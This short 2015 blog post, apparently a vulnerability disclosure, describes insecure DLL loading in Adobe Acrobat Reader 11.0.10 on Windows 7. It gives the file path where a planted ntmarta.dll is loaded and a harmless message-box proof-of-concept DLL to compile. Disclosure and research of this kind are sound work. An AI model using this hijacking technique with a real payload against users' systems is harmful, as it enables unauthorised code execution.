Saturday, February 14, 2015

Acrobat Reader Insecure DLL Loading Code Execution

Rename any malicious DLL to
C:\Program Files\Adobe\Reader 11.0\Reader\ntmarta.dll
which will be loaded by Adobe Acrobat Reader.

PoC Code part of ntmarta.dll
#include <windows.h>
BOOL WINAPI DllMain (
            HANDLE    hinstDLL,
            DWORD     fdwReason,
            LPVOID    lpvReserved)
{
  MessageBox(NULL, L"DLL Injection by Disects!", L"Developed by Praveen Darshanam",
             MB_ICONWARNING|MB_CANCELTRYCONTINUE|MB_DEFBUTTON2);
}

Compile the above code into a Dynamic Loadable Library (DLL).

Tested on
        Acrobat Reader 11.0.10
        Windows 7 Ultimate N SP1

Refer
http://blog.disects.com/2014/08/dll-injection-executing-and-testing-dlls.html
http://blog.disects.com/2015/02/google-chrome-insecure-dll-loading-code.html